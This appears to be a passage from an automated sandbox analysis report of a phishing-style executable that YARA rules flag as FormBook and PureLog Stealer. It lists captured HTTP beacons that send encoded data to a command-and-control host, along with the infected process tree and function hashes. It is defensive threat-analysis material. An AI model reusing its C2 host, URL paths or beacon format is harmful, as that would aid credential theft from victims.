Timestamp	Bytes transferred	Direction	Data
Apr 24, 2024 09:23:54.160886049 CEST	649	OUT	POST /pq0o/ HTTP/1.1 Host: www.threesomeapps.com Accept: / Accept-Language: en-us Accept-Encoding: gzip, deflate Origin: http://www.threesomeapps.com Content-Length: 222 Connection: close Content-Type: application/x-www-form-urlencoded Cache-Control: max-age=0 Referer: http://www.threesomeapps.com/pq0o/ User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0) LinkCheck by Siteimprove.com Data Raw: 46 34 39 68 73 3d 72 54 39 38 61 77 47 47 35 73 4d 52 50 6c 66 44 4b 6a 45 37 49 73 69 74 2f 68 7a 73 59 30 77 77 76 6c 49 66 45 38 34 65 68 4c 79 46 68 51 54 2b 5a 78 65 42 59 4a 41 5a 54 43 62 36 30 55 43 7a 75 73 67 49 34 42 2f 41 46 6a 38 63 52 59 2f 42 64 2b 56 61 74 57 43 2f 6c 7a 35 6b 66 68 73 4e 50 51 79 32 31 66 51 2f 6a 62 6c 36 46 65 38 4a 54 2f 54 39 6d 6b 41 46 34 35 6c 2b 4c 57 61 58 71 4c 47 4d 59 6b 37 58 44 66 31 2f 45 63 63 6e 31 57 6e 32 58 70 32 4e 72 54 2f 64 44 43 5a 57 61 47 58 4f 71 53 4d 50 6d 32 64 55 32 49 35 72 57 45 33 64 79 47 72 54 45 56 38 72 4a 39 71 33 4d 4d 43 37 6e 38 66 44 4a 31 44 66 32 46 62 65 4c 78 74 6d 78 6f 51 3d Data Ascii: F49hs=rT98awGG5sMRPlfDKjE7Isit/hzsY0wwvlIfE84ehLyFhQT+ZxeBYJAZTCb60UCzusgI4B/AFj8cRY/Bd+VatWC/lz5kfhsNPQy21fQ/jbl6Fe8JT/T9mkAF45l+LWaXqLGMYk7XDf1/Eccn1Wn2Xp2NrT/dDCZWaGXOqSMPm2dU2I5rWE3dyGrTEV8rJ9q3MMC7n8fDJ1Df2FbeLxtmxoQ=

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
43	192.168.2.4	49786	3.33.130.190	80	2412	C:\Program Files (x86)\jfLWIrNvBdXUZqKTstLPidJuesjIeBIFNQYCGaQUpAbARGedGUlMKIlGqKpEAySWKlETcTxWvVYd\tAFcdstzdUTfkmQlByDmlLl.exe

Timestamp	Bytes transferred	Direction	Data
Apr 24, 2024 09:23:56.847392082 CEST	10731	OUT	POST /pq0o/ HTTP/1.1 Host: www.threesomeapps.com Accept: / Accept-Language: en-us Accept-Encoding: gzip, deflate Origin: http://www.threesomeapps.com Content-Length: 10302 Connection: close Content-Type: application/x-www-form-urlencoded Cache-Control: max-age=0 Referer: http://www.threesomeapps.com/pq0o/ User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0) LinkCheck by Siteimprove.com Data Raw: 46 34 39 68 73 3d 72 54 39 38 61 77 47 47 35 73 4d 52 50 6c 66 44 4b 6a 45 37 49 73 69 74 2f 68 7a 73 59 30 77 77 76 6c 49 66 45 38 34 65 68 4c 36 46 67 6d 50 2b 59 53 47 42 5a 4a 41 5a 66 69 62 37 30 55 43 2b 75 73 70 44 34 42 79 33 46 68 45 63 52 37 33 42 61 50 56 61 6b 57 43 2f 73 54 35 6e 41 52 73 69 50 51 69 79 31 66 41 2f 6a 62 6c 36 46 62 77 4a 56 72 48 39 6b 6b 41 47 79 5a 6c 71 50 57 62 77 71 50 69 63 59 6e 58 74 44 76 56 2f 46 38 4d 6e 7a 6c 66 32 56 4a 32 31 73 54 2f 37 44 44 6c 7a 61 47 4c 34 71 54 34 70 6d 30 42 55 32 4d 6f 72 42 47 48 37 76 33 50 41 65 79 59 75 41 73 4b 6f 50 50 65 61 6d 73 2f 38 62 32 6a 4b 30 46 4f 56 50 7a 35 68 73 39 73 42 2b 6b 35 6d 4b 59 6f 35 57 4e 47 54 6b 42 39 4f 30 77 54 54 59 66 4a 2b 43 2f 4b 72 69 57 63 43 7a 41 46 71 46 59 45 2f 47 2b 4a 61 38 4c 4e 77 36 46 32 75 7a 51 58 6a 2b 78 4d 32 6f 71 76 5a 6e 4a 72 43 72 45 70 6c 72 67 78 55 46 33 6a 78 45 61 4a 44 52 47 77 4f 63 6e 4e 32 42 45 55 4a 42 36 44 43 68 46 77 6c 79 7a 42 71 56 55 50 4d 54 69 77 4d 50 65 44 6d 46 55 63 4e 4a 31 4a 33 78 7a 6b 46 48 76 65 70 55 4a 2b 41 50 47 64 55 59 5a 77 2b 79 43 36 2b 43 49 48 55 6e 74 2b 46 73 62 38 57 4a 48 69 55 54 49 59 41 41 46 4a 41 68 4f 4e 6c 69 6e 59 43 32 6f 57 39 57 57 4f 35 42 48 30 51 63 50 44 33 58 33 62 70 37 37 53 6e 56 4b 36 6c 54 2f 7a 55 6b 64 4b 74 59 31 46 48 75 76 73 42 35 59 46 6a 45 38 54 32 41 7a 67 54 70 46 76 4a 74 34 4e 53 48 6d 73 34 62 68 7a 64 4a 78 42 77 77 66 65 51 33 67 6d 5a 61 34 58 56 55 48 42 34 43 4c 6b 74 48 6d 6c 6b 31 34 37 35 6c 42 64 35 69 54 63 6d 47 50 75 55 58 63 65 64 58 69 49 6a 47 71 37 41 53 4c 50 2b 72 4d 34 46 67 6f 39 32 4a 38 48 69 55 74 54 4c 45 64 69 7a 39 33 57 74 53 79 77 63 61 53 73 4c 6e 71 42 55 75 4d 34 4f 54 6c 39 72 49 59 72 32 58 67 66 69 71 55 69 79 33 73 54 37 53 56 77 6b 6a 2f 67 7a 7a 49 41 34 4e 43 61 5a 54 6f 59 30 50 6d 75 43 51 6c 54 6d 43 69 73 71 4b 5a 7a 52 55 31 39 5a 48 39 33 57 34 77 4f 68 77 33 38 65 69 72 50 33 59 4c 42 4a 4a 62 57 6f 31 64 78 36 63 4a 57 45 4c 54 4b 36 4d 52 49 38 74 74 45 6f 76 4e 75 5a 79 68 35 70 53 32 38 69 72 36 79 30 64 78 74 37 2b 6d 77 35 74 45 35 51 48 79 61 6b 6e 77 76 31 69 68 74 76 35 6e 61 4b 4e 65 2b 6d 4d 35 56 55 34 6d 74 49 63 77 68 7a 56 45 7a 64 48 4d 4b 71 6a 64 6e 74 4f 46 35 79 79 43 55 6a 4c 38 4a 55 68 57 7a 69 69 4c 37 6b 74 43 56 46 76 39 59 37 4f 75 63 34 78 33 55 78 38 72 4a 34 73 4f 4c 56 31 7a 56 30 45 74 56 7a 41 6f 74 34 6c 48 42 32 48 59 6f 51 72 52 4d 52 70 46 70 34 6a 70 71 46 49 41 32 77 61 51 67 71 6e 44 77 65 6a 61 56 6e 73 74 79 72 35 76 43 38 4e 7a 44 4a 69 67 55 4e 38 51 46 35 4c 75 79 2b 44 33 4b 4d 6c 79 4b 59 6d 39 65 56 51 46 5a 71 7a 43 58 4c 75 73 44 74 65 49 2f 74 44 51 38 44 76 49 6f 50 6f 35 68 41 65 56 31 33 33 58 54 30 77 2b 79 68 2b 6a 61 64 31 51 72 49 42 71 64 6f 39 48 32 65 67 55 36 5a 50 6e 47 78 4b 46 79 52 4d 75 37 51 61 54 6e 45 42 73 51 63 6b 72 66 75 79 74 77 62 4d 71 58 6a 43 34 4b 7a 6f 70 42 5a 43 57 78 77 49 64 6d 64 72 30 68 72 33 6f 4f 78 58 6c 6b 63 7a 7a 78 42 6f 64 48 71 2f 69 55 72 6a 42 38 56 54 45 71 65 4c 42 59 34 57 4b 49 78 55 63 31 4a 50 38 50 6e 79 38 77 6f 30 72 33 42 61 51 6b 57 66 7a 4a 70 79 6d 64 4d 73 36 5a 58 55 42 71 6b 77 6b 46 4d 39 47 6e 49 64 4d 4a 68 6b 68 2f 56 6c 5a 61 4d 38 42 57 48 59 76 6a 4d 71 50 6c 65 35 51 79 52 4c 48 73 37 73 31 72 2f 51 6b 4b 43 7a 73 69 74 73 52 51 58 78 35 63 2f 67 63 72 41 58 71 43 78 6a 77 6b 46 4b 42 4b 63 64 6f 39 78 50 74 48 6c 52 70 46 37 77 33 42 66 47 67 79 38 2f 56 57 49 6f 31 4d 78 4e 2b 6e 4a 79 76 66 79 69 76 4b 4d 6e 47 4a 49 53 71 70 6e 38 6d 42 4b 74 53 55 37 69 63 79 75 54 47 36 77 6f 51 78 55 34 32 61 35 4b 41 49 44 31 76 46 7a 67 56 50 67 4b 6f 62 46 45 42 30 36 4e 52 58 4b 57 42 4c 75 76 4b 72 51 43 51 77 4a 33 67 68 45 77 30 2b 35 6b 52 66 57 71 66 75 62 43 37 6b 42 48 6b 30 4c 6c 78 68 49 72 4a 30 78 31 37 46 45 52 46 4f 44 4f 59 66 6f 72 6a 64 70 45 35 37 43 42 33 72 45 78 78 2b 33 6f 49 76 30 4e 76 43 73 71 79 4c 70 35 77 43 76 35 78 2f 4c 62 73 68 49 44 61 63 2f 64 38 61 52 35 65 6d 76 37 37 6d 6d 68 76 4a 71 43 62 39 5a 58 49 31 71 67 Data Ascii: F49hs=rT98awGG5sMRPlfDKjE7Isit/hzsY0wwvlIfE84ehL6FgmP+YSGBZJAZfib70UC+uspD4By3FhEcR73BaPVakWC/sT5nARsiPQiy1fA/jbl6FbwJVrH9kkAGyZlqPWbwqPicYnXtDvV/F8Mnzlf2VJ21sT/7DDlzaGL4qT4pm0BU2MorBGH7v3PAeyYuAsKoPPeams/8b2jK0FOVPz5hs9sB+k5mKYo5WNGTkB9O0wTTYfJ+C/KriWcCzAFqFYE/G+Ja8LNw6F2uzQXj+xM2oqvZnJrCrEplrgxUF3jxEaJDRGwOcnN2BEUJB6DChFwlyzBqVUPMTiwMPeDmFUcNJ1J3xzkFHvepUJ+APGdUYZw+yC6+CIHUnt+Fsb8WJHiUTIYAAFJAhONlinYC2oW9WWO5BH0QcPD3X3bp77SnVK6lT/zUkdKtY1FHuvsB5YFjE8T2AzgTpFvJt4NSHms4bhzdJxBwwfeQ3gmZa4XVUHB4CLktHmlk1475lBd5iTcmGPuUXcedXiIjGq7ASLP+rM4Fgo92J8HiUtTLEdiz93WtSywcaSsLnqBUuM4OTl9rIYr2XgfiqUiy3sT7SVwkj/gzzIA4NCaZToY0PmuCQlTmCisqKZzRU19ZH93W4wOhw38eirP3YLBJJbWo1dx6cJWELTK6MRI8ttEovNuZyh5pS28ir6y0dxt7+mw5tE5QHyaknwv1ihtv5naKNe+mM5VU4mtIcwhzVEzdHMKqjdntOF5yyCUjL8JUhWziiL7ktCVFv9Y7Ouc4x3Ux8rJ4sOLV1zV0EtVzAot4lHB2HYoQrRMRpFp4jpqFIA2waQgqnDwejaVnstyr5vC8NzDJigUN8QF5Luy+D3KMlyKYm9eVQFZqzCXLusDteI/tDQ8DvIoPo5hAeV133XT0w+yh+jad1QrIBqdo9H2egU6ZPnGxKFyRMu7QaTnEBsQckrfuytwbMqXjC4KzopBZCWxwIdmdr0hr3oOxXlkczzxBodHq/iUrjB8VTEqeLBY4WKIxUc1JP8Pny8wo0r3BaQkWfzJpymdMs6ZXUBqkwkFM9GnIdMJhkh/VlZaM8BWHYvjMqPle5QyRLHs7s1r/QkKCzsitsRQXx5c/gcrAXqCxjwkFKBKcdo9xPtHlRpF7w3BfGgy8/VWIo1MxN+nJyvfyivKMnGJISqpn8mBKtSU7icyuTG6woQxU42a5KAID1vFzgVPgKobFEB06NRXKWBLuvKrQCQwJ3ghEw0+5kRfWqfubC7kBHk0LlxhIrJ0x17FERFODOYforjdpE57CB3rExx+3oIv0NvCsqyLp5wCv5x/LbshIDac/d8aR5emv77mmhvJqCb9ZXI1qgyk6qjsiRvqkDZ9XM5Ys+hgzlmhoXVmueqj3axRmsJThYGjdJ5wjXQvIaZPM57Lxd2P2am6DEpTtju7WBEFEpJa/9hY9hGUj3L+7yfHz0zCHnIJ25JfPiMOIHt+Iu27KVstPY4wzizCVJIzm1da+7qiNq5B5wrQRJ5lQhD7lBPQgcfo1VFsKLuAKjG8ZNrSFTiJKfMp9Cg9l/vxM498KivjANioeMfuWARoYHaayRD0ljC2PVGZjydxjFwE3aW61Kl0H4VzGKi/UrWFG/nBTp1dIhdhHkHJqQLqZf928p17Cvqi7InnEL9qSa2RlNZKt7LsNBhSZYJzctR0vA0wsUJpRlVM9py25AS+Bn6JvLaWSGAb9s2VIlNuI62wUJEaSfvg68J2Tklf+lSsS5jRgcbkn6CAedN1BHL9FSJHVQMi24LGGoVyoJNHxzVF1kFfPKsKBlCH1bUiLSSamMpeJMhSCCR/jmZZkAFi95epjozzigS2SqrZ3kQMqomPtU0uLDGGJ9ywqCRkaFAgrZVc3L9X5F8uoup1K/Cd0/R3hd+1yDYbZBlfp1nphXVKtKZfS2kp4gM60MV0cfRfhyBtH2HSuksK+5/J1/DHI86vEzL7QnthW/fW6wL9fae3hYzdozAkHqz1zUKR5Yru2SsOoVL+e2aE9jD5B4xsjTktVubqtPW/JqH2UIsTIXYiOZ88vJLgoBWF3xTPvcMaNXycDPPKQv9DvE0weOa/FjjfeEhsQckdm5wvVv2kp1KYde10zSZWJEHIvt/IPV149g6tL2j/lcybIGw5yBIrNQWRgEAKgOTxUpZ/vOuCiUgraMgH7QO+YAdYTUzYhDEGQ4O2xQWK+lQh3j2jstNA/8dSVTOB1dgMSGT7yaGHuLtE0x2EGD2ul5GOuzYEdvZuLMoTAxvZgGo/e68QiwzgHs9gB2SKzGIbyIBi/I3zXkT3dLPCohMsAeSYhbP9H8luwNblDAl+8DZsf2cnKwLVGJqATUMkDxPNc/yzfICh/jnadKCMH6hUjpOx8bKk9bHnqgXbhklkzw4DzZCSFnXc1L0JiPebrQkD9RbTc/CQwsUf1fiNesPuXmiyu50Tjv0CJ0ZzEytBywZpnivmNouD0xKQjqe5+ixuMpX9YkcCu49w45J0qcfhs3kDA4i17tig2YlSE6RihtpQXswR+nk2uk+fXz8YTDcB1u9h2GyVhlVY5JwlOrrjQymRYm/w/OYWFToZax4/4QxmbPr9vmAk1QL9m00ebmC7/1kS3nEqqnA+QLbEvK+T8+HQnKcIK+Bz9c4pXywuzKUTd/QJOTRYqKsqJSWy2ioe0A3qNrRumRaKCSBDyzXby2lvkonWGoUIDuB7CnE8ncatRQYRhBbljfGl7IzQQtvKYUSADtj2qq8bZMTTP3kO8FGdJifixEua8ATG7OZXpMd0NIV9ZVUKU5Y5TyD3cgBjWhs/kaVhrk3odLZqi5jxh+RU1MkDTWZ9YERoWtD2lnNAbtm/NHMUY8/eFxrPH99ragWTMh2pQOsbXAB4bsUQY7x7rA21WR0NnZHagbdU523dqZvhlxCa47KPT+wEfPcxXNuA2lHyscMkPOCw2Oa2ZO9e+i6n/esfBpPf6WKpDZ2It3MqJ4Pjk2SCv8MAxuiqhUDS6CotxF2Ge2Pzz3NFDvR4LBMWePjLs4POT4C/gtMXfqGXytVtbGmeM0jZleBq3LPU0Y8RLbtMBSItQg4jj+4G0BZN5lNK2q22eTUGZtwTsDLyecENv9Aa0lyitaUMdDuTCm8xsGr7ZYkaS8CkdngdX0Fyi3IGS1OJPxbqIM+Btc1VuE2q4o/YaSxNMvTYTMVx4r1RnKx9CxfYwj9o7GoFwpzj6MgBiVrYetOg3+LPMmCf734iyrvf/nHGnc+1gSi7jadXGUCNfSSVCxnlOSUBRugjM9QXUwU0wzI7PdOW8dmXqpqtJBX5HBzo5wgde9NMk+Djbu5B4Xo580Gz4N7NwDE6OT0UUCxNnozXVPENGWzpT1PPdNOdjeB7irt9+BgViFvGEAVyXsGFat5QC+o/pKl4nYSyk30q46bCURGaYSNSqAwLErDFd4DCLqybeOfcVcGu86XYgfZEicfDQ+peMLFPhYRSw4wAYTBRYKzPNW2o9nkzwq2u04EoBO+gFpSMt3BMZrukzJ0kZWVrpdWtXpPqG0Gf8XpgheSo/0L5UbkXNW6dTVtLzAmE8UUYZnfWW4p5Kpjh6lZGI6kupE45JygRffH7Q362TwHHR3A4/juy2C7qBbQtHngPZhaGTzFG8pwyHTkIVvwTy/p7c3wJ4Fqj6YEyNyacOKM2YBYBJVwpowfpeE3STdcCLOaZl4wZNWRZfkGt68laGEdpPCGVKUB28LqX3BIEhmbOggI99G0ansqls/UvQg3kK848LZgHr/QhWU7KYi3l0yoo/4WEzQIsvCkNyu97/7HGC8JQ6OXtAo8MvOGdv4plwiO70Ynv6WNwZjUglmK52RgqtN3auHdCWW2F2tRGaFRfzIDQ5kjNVb4X/bxapHue+zhmAQNP3uOU3E8GEl5sQ1BoYkO3djXUksq0l2aq67a3gcj0242dknSZ780IeqDbiPKwFP9Wuog8318gskR4ZaDQzUjy2PYpM3Rk+mSD+EN1A5KDX6XwBwba4+jxu6m0koV1pqs88CmABuGUoFEG5gM70/GsLlWMQlShTGiGgTi1x+PRbwkxRrpWD

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
44	192.168.2.4	49787	3.33.130.190	80	2412	C:\Program Files (x86)\jfLWIrNvBdXUZqKTstLPidJuesjIeBIFNQYCGaQUpAbARGedGUlMKIlGqKpEAySWKlETcTxWvVYd\tAFcdstzdUTfkmQlByDmlLl.exe

Timestamp	Bytes transferred	Direction	Data
Apr 24, 2024 09:23:59.535301924 CEST	363	OUT	GET /pq0o/?9ZZXx=T6kxVZuXAVuH9J&F49hs=mRVcZEOhq89+MGHBKj9OIc/04Av6T2wEhyk9HpRK9pO5sVzjQ2X+QIoGEwrX8lym3PQN8R/kDgsMd57+ef1OrGKEsTU4CFRzLSC8xo47mPR0FpBjSaDhnxk= HTTP/1.1 Host: www.threesomeapps.com Accept: / Accept-Language: en-us Connection: close User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0) LinkCheck by Siteimprove.com

Target ID:	0
Start time:	09:19:59
Start date:	24/04/2024
Path:	C:\Users\user\Desktop\PO0424024.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\PO0424024.exe"
Imagebase:	0x230000
File size:	833'544 bytes
MD5 hash:	192BE7AC2833574AAFEEEA8E0CD52380
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000002.1735920141.0000000006E70000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000002.1729875673.00000000036F9000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	2
Start time:	09:20:02
Start date:	24/04/2024
Path:	C:\Users\user\Desktop\PO0424024.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\PO0424024.exe"
Imagebase:	0x4a0000
File size:	833'544 bytes
MD5 hash:	192BE7AC2833574AAFEEEA8E0CD52380
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.2174491857.00000000012C0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000002.2174491857.00000000012C0000.00000040.10000000.00040000.00000000.sdmp, Author: unknown Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.2172226006.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000002.2172226006.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.2174679636.0000000001470000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000002.2174679636.0000000001470000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	6
Start time:	09:20:39
Start date:	24/04/2024
Path:	C:\Program Files (x86)\jfLWIrNvBdXUZqKTstLPidJuesjIeBIFNQYCGaQUpAbARGedGUlMKIlGqKpEAySWKlETcTxWvVYd\tAFcdstzdUTfkmQlByDmlLl.exe
Wow64 process (32bit):	true
Commandline:	"C:\Program Files (x86)\jfLWIrNvBdXUZqKTstLPidJuesjIeBIFNQYCGaQUpAbARGedGUlMKIlGqKpEAySWKlETcTxWvVYd\tAFcdstzdUTfkmQlByDmlLl.exe"
Imagebase:	0xc00000
File size:	140'800 bytes
MD5 hash:	32B8AD6ECA9094891E792631BAEA9717
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.4176035041.0000000008660000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000006.00000002.4176035041.0000000008660000.00000040.80000000.00040000.00000000.sdmp, Author: unknown Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.4170805786.0000000002800000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000006.00000002.4170805786.0000000002800000.00000040.00000001.00040000.00000000.sdmp, Author: unknown
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	7
Start time:	09:20:40
Start date:	24/04/2024
Path:	C:\Windows\SysWOW64\takeown.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\SysWOW64\takeown.exe"
Imagebase:	0x270000
File size:	51'712 bytes
MD5 hash:	A9AB2877AE82A53F5A387B045BF326A4
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000007.00000002.4170807354.00000000034D0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000007.00000002.4170807354.00000000034D0000.00000004.00000800.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000007.00000002.4170764124.0000000003490000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000007.00000002.4170764124.0000000003490000.00000004.00000800.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000007.00000002.4157652949.0000000002F00000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000007.00000002.4157652949.0000000002F00000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
Reputation:	moderate
Has exited:	false

Show Windows behavior

Target ID:	8
Start time:	09:21:05
Start date:	24/04/2024
Path:	C:\Program Files\Mozilla Firefox\firefox.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Mozilla Firefox\Firefox.exe"
Imagebase:	0x7ff6bf500000
File size:	676'768 bytes
MD5 hash:	C86B1BE9ED6496FE0E0CBE73F81D8045
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	10.5%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	0%
Total number of Nodes:	189
Total number of Limit Nodes:	11

Executed Functions

Function 04D97684 Relevance: .7, Instructions: 716COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1732969193.0000000004D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4d90000_PO0424024.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 404121bc42b286c84339f07c3a7c696f02070776c557e872a697a21a1d413d72
Instruction ID: 9adab7e828444697f73b748d17cb42a7fbd094f4c3d0c4320098dfc17fc7be30
Opcode Fuzzy Hash: 404121bc42b286c84339f07c3a7c696f02070776c557e872a697a21a1d413d72
Instruction Fuzzy Hash: 2D72D834A40259CFDB24DB64C894FA9B7B2FF89304F5181EAE5096B361DB31AE81DF50

Uniqueness

Uniqueness Score: -1.00%

Function 04D9BC28 Relevance: .7, Instructions: 713COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1732969193.0000000004D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4d90000_PO0424024.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d2f2ebb2b31a4b2e98f81efc86563d3c0b00589f328805b605d1a5670de8e222
Instruction ID: 096102606972d614684916ca70e210739902edfe81f44a49638197c9a84c5cb4
Opcode Fuzzy Hash: d2f2ebb2b31a4b2e98f81efc86563d3c0b00589f328805b605d1a5670de8e222
Instruction Fuzzy Hash: EC72D834A40259CFDB24DB64C894FA9B7B2FF89304F5181EAD9096B361DB31AE81DF50

Uniqueness

Uniqueness Score: -1.00%

Function 071F12A0 Relevance: .6, Instructions: 585COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1736899059.00000000071F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_71f0000_PO0424024.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fe34610867b5cbca4cea092aec4029469c22b4bf8414c1f86679ba2119231149
Instruction ID: 7558d44aa6c386d92c01b1bbfe5afc2d5661ee1cf3fcb82b3d63079483595633
Opcode Fuzzy Hash: fe34610867b5cbca4cea092aec4029469c22b4bf8414c1f86679ba2119231149
Instruction Fuzzy Hash: 61227AB0B012099FDB19EB69D550BAEB7F7AF89700F144469E2469B3E0DB34ED02CB51

Uniqueness

Uniqueness Score: -1.00%

Function 04CC6E40 Relevance: .6, Instructions: 563COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1732891577.0000000004CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04CC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4cc0000_PO0424024.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a57e70867862ca00e51e82b7dc94461d132716ab0bd73f243c28f7ad8b24eb05
Instruction ID: e967d89b8635f5983e8a6aaf17738443462e1a1a56c383dde30ba39c3bcab0bd
Opcode Fuzzy Hash: a57e70867862ca00e51e82b7dc94461d132716ab0bd73f243c28f7ad8b24eb05
Instruction Fuzzy Hash: 4342C274A012198FDB14DF68C994BADBBB2FF89304F1185E9D509AB361DB30AE85CF50

Uniqueness

Uniqueness Score: -1.00%

Function 04CC6E33 Relevance: .5, Instructions: 485COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1732891577.0000000004CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04CC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4cc0000_PO0424024.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e0ed3696ac3da378af68bdc55bb95a04db6fa38481a11ff7a26d8c8814e5e070
Instruction ID: 589ec1f2b3286b1690291e4bf5bce4cd87fc1a26c0edfcb65311683fe3b0c98b
Opcode Fuzzy Hash: e0ed3696ac3da378af68bdc55bb95a04db6fa38481a11ff7a26d8c8814e5e070
Instruction Fuzzy Hash: DE32C174A012288FEB14DF68C994B99B7B2FF89304F1185E9D50DAB365DB30AE85CF41

Uniqueness

Uniqueness Score: -1.00%

Function 071004A8 Relevance: .2, Instructions: 234COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1736606355.0000000007100000.00000040.00000800.00020000.00000000.sdmp, Offset: 07100000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7100000_PO0424024.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e4ace77e710443386a0aeeb30144a9a806d6c5d197254fb75552a7ac4186309a
Instruction ID: e16db422ef02fa779b7ea68cbc4582b2eb52fb610fe0786c0999c6aff3a30bd4
Opcode Fuzzy Hash: e4ace77e710443386a0aeeb30144a9a806d6c5d197254fb75552a7ac4186309a
Instruction Fuzzy Hash: 38910BB4E15609DFCB08CFA5E584ADDFBB2FB89300F20A41AE416B72A4D7749A05CF54

Uniqueness

Uniqueness Score: -1.00%

Function 071004B8 Relevance: .2, Instructions: 231COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1736606355.0000000007100000.00000040.00000800.00020000.00000000.sdmp, Offset: 07100000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7100000_PO0424024.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8d00aeece33bcf304f1f5f9f17d5b5410ca7b28f3d16d179662de5778333681e
Instruction ID: eacee0479e11ceeb1c4f8c725fcba6bb07613bd27a99b9f159b7d98444e7ee9b
Opcode Fuzzy Hash: 8d00aeece33bcf304f1f5f9f17d5b5410ca7b28f3d16d179662de5778333681e
Instruction Fuzzy Hash: BA91FBB0D15609DFCB08CFE5E584A9DFBB2FB89300F20A419E416B72A4D7749A45CF54

Uniqueness

Uniqueness Score: -1.00%

Function 07100190 Relevance: .2, Instructions: 206COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1736606355.0000000007100000.00000040.00000800.00020000.00000000.sdmp, Offset: 07100000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7100000_PO0424024.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d9f610dad6569a65ddb686f22e008ac9f35b62e72e4b1c0a3f236e2df0cdbb13
